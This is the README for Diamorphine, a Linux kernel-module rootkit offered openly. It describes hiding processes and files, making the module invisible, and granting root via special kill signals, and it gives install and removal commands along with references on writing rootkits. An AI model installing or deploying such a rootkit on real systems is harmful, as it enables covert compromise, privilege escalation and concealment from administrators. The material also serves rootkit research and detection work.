Diamorphine
Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)
Features
-
When loaded, the module starts invisible;
-
Hide/unhide any process by sending a signal 31;
-
Sending a signal 63(to any pid) makes the module become (in)visible;
-
Sending a signal 64(to any pid) makes the given user become root;
-
Files or directories starting with the MAGIC_PREFIX become invisible;
Install
Verify if the kernel is 2.6.x/3.x/4.x/5.x
uname -r
Clone the repository
git clone https://github.com/m0nad/Diamorphine
Enter the folder
cd Diamorphine
Compile
make
Load the module(as root)
insmod diamorphine.ko
Uninstall
The module starts invisible, to remove you need to make it visible
kill -63 0
Then remove the module(as root)
rmmod diamorphine
References
Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit
Linux Device Drivers http://lwn.net/Kernel/LDD3/
LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html
Memset's blog http://memset.wordpress.com/
Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html
WRITING A SIMPLE ROOTKIT FOR LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
Linux Cross Reference http://lxr.free-electrons.com/
zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/
Linux Rootkits: New Methods for Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/
